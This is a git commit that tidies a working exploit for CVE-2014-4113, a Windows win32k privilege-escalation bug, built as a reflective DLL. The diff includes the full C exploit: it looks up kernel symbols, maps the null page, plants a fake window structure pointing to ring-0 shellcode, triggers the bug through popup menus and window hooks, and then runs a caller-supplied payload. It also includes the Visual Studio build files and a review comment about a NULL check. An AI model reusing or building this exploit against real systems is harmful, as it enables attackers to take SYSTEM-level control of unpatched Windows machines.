Fix project settings, make files, start tidying of code

OJ 2014-10-28 07:58:19 +10:00
parent 1508be6254
commit 062eff8ede
5 changed files with 295 additions and 169 deletions


@ -1,9 +1,9 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop
VisualStudioVersion = 12.0.30723.0
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -13,14 +13,14 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
{E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE


@ -2,6 +2,9 @@
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Uncomment this line to enable to debug output
#define DEBUGGING
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
@ -9,18 +12,22 @@
#include <windows.h>
#undef WIN32_NO_STATUS
#ifdef DEBUGGING
#include <stdio.h>
#endif
#ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
#define DEBUGGING FALSE
#ifdef _M_X64
typedef unsigned __int64 QWORD;
typedef QWORD *PQWORD;
#endif
#define PTR_SIZE sizeof(UINT_PTR)
int WndProcClue = 0;
int HookCallbackClue = 0;
WNDPROC lpPrevWndFunc;
@ -34,21 +41,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
);
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
IN HANDLE ProcessId,
OUT PVOID Process
);
);
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
);
typedef struct _SYSTEM_MODULE {
typedef struct _SYSTEM_MODULE
{
HANDLE Reserved1;
PVOID Reserved2;
PVOID ImageBaseAddress;
@ -61,8 +69,8 @@ typedef struct _SYSTEM_MODULE {
BYTE Name[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct _SYSTEM_MODULE_INFORMATION {
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG ModulesCount;
SYSTEM_MODULE Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
@ -70,6 +78,20 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
#ifdef DEBUGGING
void LogMessage(char* pszFormat, ...)
{
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
#else
#define LogMessage(...)
#endif
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
@ -77,27 +99,23 @@ long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
return -5;
}
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
#ifdef _M_X64
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
#else
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
#endif
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam)
{
if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !HookCallbackClue)
{
HookCallbackClue = 1;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
#ifdef _M_X64
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback))
{
lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
}
}
return CallNextHookEx(0, code, wParam, lParam);
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == 289 && WndProcClue != 1) {
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
if (msg == 289 && WndProcClue != 1)
{
WndProcClue = 1;
PostMessageA(hwnd, 256, 40, 0);
PostMessageA(hwnd, 256, 39, 0);
@ -114,15 +132,17 @@ QWORD MyPtiCurrent(void) {
return Win32ThreadInfo;
}
#else
DWORD __stdcall MyPtiCurrent() {
DWORD __stdcall MyPtiCurrent()
{
__asm {
mov eax, fs : 18h
mov eax, [eax + 40h]
mov eax, [eax + 40h]
}
}
#endif
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *my_process_info = NULL;
void *system_info = NULL;
@ -134,27 +154,15 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four) {
return 0;
}
void
LogMessage(char* pszFormat, ...) {
if (DEBUGGING != TRUE) {
return;
}
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
DWORD WINAPI ExecutePayload(LPVOID lpPayload)
{
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
void Win32kNullPage(LPVOID lpPayload) {
void Win32kNullPage(LPVOID lpPayload)
{
HWND hWnd;
WNDCLASSA WndClass;
LPBYTE promise_land = NULL;
@ -178,18 +186,25 @@ void Win32kNullPage(LPVOID lpPayload) {
}
#ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0x208;
}
#else
if (VersionInformation.dwMajorVersion == 6) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
if (VersionInformation.dwMajorVersion == 6)
{
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1)
{
// Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0xf8;
}
else if (!VersionInformation.dwMinorVersion) {
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
else if (!VersionInformation.dwMinorVersion)
{
// Ex: Windows 2008 R2
LogMessage("[*] Windows 6.0 found...");
OffsetWindows = 0xe0;
}
else {
@ -221,13 +236,15 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) {
if (hNtdll == NULL)
{
LogMessage("[!] Failed to Load ntdll...");
return;
}
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) {
if (pZwQuerySystemInformation == NULL)
{
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
return;
}
@ -242,23 +259,25 @@ void Win32kNullPage(LPVOID lpPayload) {
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
if (SystemInfoBufferSize == 0) {
if (SystemInfoBufferSize == 0)
{
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
return;
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
if (pSystemInfoBuffer == NULL)
{
LogMessage("[!] Allocation for SystemInfo failed");
return;
}
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
if (status != STATUS_SUCCESS) {
if (status != STATUS_SUCCESS)
{
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
@ -272,13 +291,16 @@ void Win32kNullPage(LPVOID lpPayload) {
memset(nt_name, 0, 256);
int i = 0;
while (i < smi->ModulesCount) {
ULONG i = 0;
while (i < smi->ModulesCount)
{
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) {
if (strstr((char *)sm->Name, ".exe"))
{
char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) {
if (start != NULL)
{
nt_base = sm->ImageBaseAddress;
strncpy_s(nt_name, 256, start, _TRUNCATE);
break;
@ -287,13 +309,12 @@ void Win32kNullPage(LPVOID lpPayload) {
i++;
}
if (nt_name == NULL) {
if (nt_name == NULL)
{
LogMessage("[!] nt not found");
return;
}
else {
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
ntkrnl = LoadLibraryA(nt_name);
@ -301,7 +322,8 @@ void Win32kNullPage(LPVOID lpPayload) {
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) {
if (pPsLookupProcessByProcessId == NULL)
{
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
return;
}
@ -323,7 +345,8 @@ void Win32kNullPage(LPVOID lpPayload) {
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) {
if (!RegisterClassA(&WndClass))
{
LogMessage("[!] RegisterClassA failed ");
return;
}
@ -332,7 +355,8 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) {
if (hWnd == NULL)
{
LogMessage("[!] CreateWindowExA failed");
return;
}
@ -351,7 +375,9 @@ void Win32kNullPage(LPVOID lpPayload) {
current_process = GetCurrentProcess();
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)&base_address, 0, &region_size, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
LogMessage("[!] Failed to allocate null page");
return;
}
@ -364,17 +390,20 @@ void Win32kNullPage(LPVOID lpPayload) {
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) {
if (pti == 0)
{
LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll");
pti = MyPtiCurrent();
}
if (pti == 0) {
if (pti == 0)
{
LogMessage("[!] Filed to get PtiCurrent");
return;
}
else {
else
{
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
@ -395,7 +424,7 @@ void Win32kNullPage(LPVOID lpPayload) {
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0;
*((PQWORD)test) = (QWORD)&shellcode_ring0;
#else
void *test = promise_land + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
@ -415,7 +444,8 @@ void Win32kNullPage(LPVOID lpPayload) {
LogMessage("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu();
if (MenuOne == NULL) {
if (MenuOne == NULL)
{
LogMessage("[!] First CreatePopupMenu failed");
return;
}
@ -425,14 +455,16 @@ void Win32kNullPage(LPVOID lpPayload) {
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE)
{
LogMessage("[!] First InsertMenuItemA failed");
DestroyMenu(MenuOne);
return;
}
HMENU MenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) {
if (MenuTwo == NULL)
{
LogMessage("[!] Second CreatePopupMenu failed");
DestroyMenu(MenuOne);
return;
@ -445,14 +477,17 @@ void Win32kNullPage(LPVOID lpPayload) {
MenuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE)
{
LogMessage("[!] Second InsertMenuItemA failed");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL)
{
LogMessage("[!] SetWindowsHookExA failed :-(\n");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
@ -465,15 +500,17 @@ void Win32kNullPage(LPVOID lpPayload) {
// If everything worked process should be privileges at this point
LogMessage("[!] Executing payload...");
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason) {
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL) {
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
@ -487,4 +524,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
break;
}
return bReturnValue;
};
}
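Review bot: The `if (nt_name == NULL)` guard after the module loop can never fire if `nt_name` is the fixed 256-byte buffer that `memset(nt_name, 0, 256)` and `strncpy_s(nt_name, 256, start, _TRUNCATE)` suggest; its declaration is outside the hunks shown. When the scan matches no module, control therefore skips the "nt not found" return, logs "Good! nt found" with an empty name, and reaches `LoadLibraryA(nt_name)` with an empty string. Because the buffer is zeroed just before the loop, the check should test its contents instead: `if (nt_name[0] == '\0')`. Win32kNullPage starts and ends outside this hunk, so confirm the declaration of `nt_name` before changing it.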


@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -19,132 +19,220 @@
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
<RootNamespace>cve20144113</RootNamespace>
<ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
<RootNamespace>cve-2014-4113</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
